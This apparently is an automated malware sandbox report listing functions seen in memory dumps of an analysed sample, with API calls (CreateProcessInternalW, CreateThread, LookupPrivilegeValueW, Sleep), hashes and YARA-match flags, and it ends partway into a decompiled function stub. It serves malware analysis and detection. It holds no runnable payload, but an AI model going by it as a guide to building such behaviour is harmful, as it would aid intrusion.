                                                                        • Opcode ID: b5510724e1c233651a0dd918041d5df8aa100af11b3c1de4c815506426854f87
                                                                        • Instruction ID: 5d6fce4f5a0c847ccccca83df8c6cd83f0dc236824457d7fdb927a96a3687bf7
                                                                        • Opcode Fuzzy Hash: b5510724e1c233651a0dd918041d5df8aa100af11b3c1de4c815506426854f87
                                                                        • Instruction Fuzzy Hash: 6290027120100427F152615945147470049D7D0285F91C922A1919678DD696E956B1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 30e9eb96b9778ae4e53b6296a79d88ac4dacf4241f5afce2013247901d24fb53
                                                                        • Instruction ID: 39c2ea12f90cb8925bfd13d6028c1cb1659d9e1351c2f18d743ce9727445e0b6
                                                                        • Opcode Fuzzy Hash: 30e9eb96b9778ae4e53b6296a79d88ac4dacf4241f5afce2013247901d24fb53
                                                                        • Instruction Fuzzy Hash: E89002A134100457F14161594424B460045D7E1345F51C525E2559674DC659EC5671A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 40d325c03237ec42e9d468d3a6ed948e0e05be89f419cb933fb1338fa7ff903d
                                                                        • Instruction ID: 53ae6dcb196823448fdcacda62cb2700f0de80213a1db3696a0ab7c824c0229f
                                                                        • Opcode Fuzzy Hash: 40d325c03237ec42e9d468d3a6ed948e0e05be89f419cb933fb1338fa7ff903d
                                                                        • Instruction Fuzzy Hash: FE9002A120200017614671594424656404AD7E0245B51C531E25096B0DC565E89571A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 307df9fd2eefe9d63d947b44055390ea62388724cedd5dc6e3c3f51a09f1dd40
                                                                        • Instruction ID: 12271ba6536dc88f61c54c3666cd6df4e901501cfbf79521280617c4500e7be3
                                                                        • Opcode Fuzzy Hash: 307df9fd2eefe9d63d947b44055390ea62388724cedd5dc6e3c3f51a09f1dd40
                                                                        • Instruction Fuzzy Hash: 479002B120100417F181715944147860045D7D0345F51C521A6559674EC699EDD976E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3f93949741a707202fbc55c40e9b3d3d6a2fe0ac2e0f65cc4e73ea97c9bb0b1a
                                                                        • Instruction ID: 3e74eb3ca0fbdfed8630a37834d794f25c20f2e7730cd0bbc935ba883e08d33b
                                                                        • Opcode Fuzzy Hash: 3f93949741a707202fbc55c40e9b3d3d6a2fe0ac2e0f65cc4e73ea97c9bb0b1a
                                                                        • Instruction Fuzzy Hash: AA900265211000172146A55907145470086D7D5395351C531F250A670CD661E86561A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c8bb80764dc1d2f27fc8e3757c03163575eb4c2ee3e996a33e8859006944ebda
                                                                        • Instruction ID: 95cfe094f09bd37ca383e85ea5ca8c3da7910311da2d6b89b1f28c273d105912
                                                                        • Opcode Fuzzy Hash: c8bb80764dc1d2f27fc8e3757c03163575eb4c2ee3e996a33e8859006944ebda
                                                                        • Instruction Fuzzy Hash: F390027120100857F14161594414B860045D7E0345F51C526A1619774DC655E85575A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e791600b31c65f271158bd8a5ce236a6b35951b165ede50208a6924a8b82ab4a
                                                                        • Instruction ID: b49335eb879485d13d5d553fc0f7199de62af41b4782302c740b8fb0246081f0
                                                                        • Opcode Fuzzy Hash: e791600b31c65f271158bd8a5ce236a6b35951b165ede50208a6924a8b82ab4a
                                                                        • Instruction Fuzzy Hash: 0090027120108817F1516159841478A0045D7D0345F55C921A5919778DC6D5E89571A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6c1b181fa2a7b8550dc3fa4ec7588981991c7624b529c3c2b20e708081e3e135
                                                                        • Instruction ID: 2a0e74894ce257b4abb000e48bdae7fd2f5afc32c0b5246acd1f4f644a2398d9
                                                                        • Opcode Fuzzy Hash: 6c1b181fa2a7b8550dc3fa4ec7588981991c7624b529c3c2b20e708081e3e135
                                                                        • Instruction Fuzzy Hash: 5090027120504857F18171594414A860055D7D0349F51C521A15597B4DD665ED59B6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 02cfcbe0c965cba729053762a0ed78bb40c1124eb9d7cddb7e03ce5220dd1a5a
                                                                        • Instruction ID: 0e6789e3795b906c913009027fafb3113e8f58e5f348080930d960fab5225536
                                                                        • Opcode Fuzzy Hash: 02cfcbe0c965cba729053762a0ed78bb40c1124eb9d7cddb7e03ce5220dd1a5a
                                                                        • Instruction Fuzzy Hash: 2190026121180057F24165694C24B470045D7D0347F51C625A1649674CC955E86565A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 757e69e53c19375e7b38d73c382097650b9ad573f0673c20a44de219923050da
                                                                        • Instruction ID: 40537e5586aae8fb081e6c35c7aee01362ff77269fda0b6b61d2258f6cd03bc2
                                                                        • Opcode Fuzzy Hash: 757e69e53c19375e7b38d73c382097650b9ad573f0673c20a44de219923050da
                                                                        • Instruction Fuzzy Hash: F090027120100817F1C17159441468A0045D7D1345F91C525A151A774DCA55EA5D77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 63805b4bca45ca385691e3f54ee5fd72b96488e75cb6b51218ea4ed26a4d0870
                                                                        • Instruction ID: 36e45550271722845db51a3d5fcc56d9d589c6e423b1abacd2ae1f21525f662b
                                                                        • Opcode Fuzzy Hash: 63805b4bca45ca385691e3f54ee5fd72b96488e75cb6b51218ea4ed26a4d0870
                                                                        • Instruction Fuzzy Hash: F390026921300017F1C17159541864A0045D7D1246F91D925A150A678CC955E86D63A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b6969c8e3eb4a16c0c5e178e2951653bb89a204d6d0c814bdc7d5c7a7b93b7be
                                                                        • Instruction ID: 13380171af4aed83a7489d6ad10c0f6e9f7bb848b92d25196e8832602e001246
                                                                        • Opcode Fuzzy Hash: b6969c8e3eb4a16c0c5e178e2951653bb89a204d6d0c814bdc7d5c7a7b93b7be
                                                                        • Instruction Fuzzy Hash: E790027131114417F151615984147460045D7D1245F51C921A1D19678DC6D5E89571A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d9d719abe08500029a58f27d0b464eeec5953810229d3fda97efba1e554162ba
                                                                        • Instruction ID: 03e6a3e67f965b2f26a5686bec4f069910b33f357b8bf672861c661efc64cd53
                                                                        • Opcode Fuzzy Hash: d9d719abe08500029a58f27d0b464eeec5953810229d3fda97efba1e554162ba
                                                                        • Instruction Fuzzy Hash: B190027120100417F141659954186860045D7E0345F51D521A6519675EC6A5E89571B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00626EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00626F88
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: c15d1128f69f8fabc85da509739f323c0425849fb4ad6a3d3ce67de80eef41de
                                                                        • Instruction ID: 58959252372799c7647bfebad579be89104f96b2eeb65b583c8f3e036d89537f
                                                                        • Opcode Fuzzy Hash: c15d1128f69f8fabc85da509739f323c0425849fb4ad6a3d3ce67de80eef41de
                                                                        • Instruction Fuzzy Hash: A03190B1601704ABC711DF64E8A1FA7B7BAAB88700F10851DF61AAB241D770B545CFE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006284C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00613B93), ref: 006284FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 1588351900f1f7f15cd1f66ade8d6688544561854e9805eda088ec6d4a5c407c
                                                                        • Instruction ID: dd47f6922bb5f0109a2779bbee5c49ef518756932901d3898aa3db61283772db
                                                                        • Opcode Fuzzy Hash: 1588351900f1f7f15cd1f66ade8d6688544561854e9805eda088ec6d4a5c407c
                                                                        • Instruction Fuzzy Hash: F9F084B92856606FCB10DFB8AC40EEB7B98DF80354F04069DF84D97283C631DA16CAA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006284D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00613B93), ref: 006284FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: d0b98c7f1114d988aa512379be9cb069d2ccc4fa11d8daf887a1a868b7e2a9ea
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: E1E04FB12002146FD714DF59DC45EA777ADEF88750F014558FD0857282CA30F914CAF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00617260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006172BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006172DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                        • Instruction ID: 293c5203fd3a1744eee1a48ee0325cc93c0c5f553cad5b3f3b0ef9aac7b51dcc
                                                                        • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                        • Instruction Fuzzy Hash: A301A731E8062877E760A6949C03FFE776D9F40B50F550119FF04BA1C1E6A46A0647F9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00619B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00619B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 2db8f2599fc8cbdcfeadd6a3d96579dc5206adc6f0249e993f206a5f3492b4ad
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: 51011EB5D0020DABDF10DAE4EC56FDEB7B99B54308F044199A90897241F671EB54CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0062853D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628594
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: ac0493af3a74a3912627a04ca982c19317b969df5bdb95e380e847bb80063fc4
                                                                        • Instruction ID: 863e1c05346953545aff126c8ecdaa1cce0630a8badb9d0eb0fe6b58a0d7afd2
                                                                        • Opcode Fuzzy Hash: ac0493af3a74a3912627a04ca982c19317b969df5bdb95e380e847bb80063fc4
                                                                        • Instruction Fuzzy Hash: B301AFB2211108AFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241DA30ED51CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00628540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628594
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: bfe3cfebda80431fa11c78a7d21dc3710cca8fc4e21fc3ddde322e9f2f887241
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: D201AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00627005, Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0061CCD0,?,?), ref: 0062704C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: a03de2c26fde9edebd994b17b2fbdab19bffd88354ae8aee89042dbd2221a61e
                                                                        • Instruction ID: b669531c55a304b0559ff523514194c61910933e958bb066e6b6776b96f14116
                                                                        • Opcode Fuzzy Hash: a03de2c26fde9edebd994b17b2fbdab19bffd88354ae8aee89042dbd2221a61e
                                                                        • Instruction Fuzzy Hash: 64F0EC722407143BD3302968AC03FD3735DCF81B20F640019F7496B2C1C595B80686A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00627010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0061CCD0,?,?), ref: 0062704C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                        • Instruction ID: 98dbf9aeb43f2365fc0c301f0e68d03f3ea096605e101ea02b13a58a444dd9ca
                                                                        • Opcode Fuzzy Hash: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                        • Instruction Fuzzy Hash: 24E06D733906243AE2306599AC02FE7B39D9B81B20F55002AFA4DEA2C1D595F80546A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006286A2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0061CFA2,0061CFA2,?,00000000,?,?), ref: 00628660
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction ID: 8005dd9675da94259b7e548dada43754992199fa22195ae6fe3b8a4c353c0e17
                                                                        • Opcode Fuzzy Hash: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction Fuzzy Hash: EAE092365016146FE620EBA8AC48DEB776DDF84360F418955FD1D97242C536D9148A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00628490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00623516,?,00623C8F,00623C8F,?,00623516,?,?,?,?,?,00000000,00000000,?), ref: 006284BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: ed9103a06210a472e35c188e5fc393aced9099954f5f8a0cb5ed04b9a55e1d5d
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: F0E012B1200218ABDB14EF99DC41EA777ADAF88650F118958FA085B282CA30F9148AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00628630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0061CFA2,0061CFA2,?,00000000,?,?), ref: 00628660
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: 83c4ae5a33f9b5a5aaa2c8261d203a6c34e35e44e45661c47da1fa68c5faeda6
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: DBE01AB12002186BDB10DF49DC85EE737ADAF88650F018554FA0857282C930E8148BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0061D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00617C63,?), ref: 0061D43B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: 5b842d6d77eb53631344f3d98652477c779c278e5e817049a955121892dbf140
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: BDD0A7717503043BE610FBA89C03FA632CD5B54B00F494064F989D73C3DA64F5004565
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048A967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e35fcc49e831cdffd9aebff73aa44c87a9b41adb18b039d637b184505af462b5
                                                                        • Instruction ID: 8dddcfe163df2d7c0c8a367a3ea162ad29dd2c3f80f4b5aa3fb0526459b4a1ce
                                                                        • Opcode Fuzzy Hash: e35fcc49e831cdffd9aebff73aa44c87a9b41adb18b039d637b184505af462b5
                                                                        • Instruction Fuzzy Hash: 00B02BB18010C0CAF701D76006087173900BBC0300F17C921D2024350A4378E090F1F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 048FFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E048FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
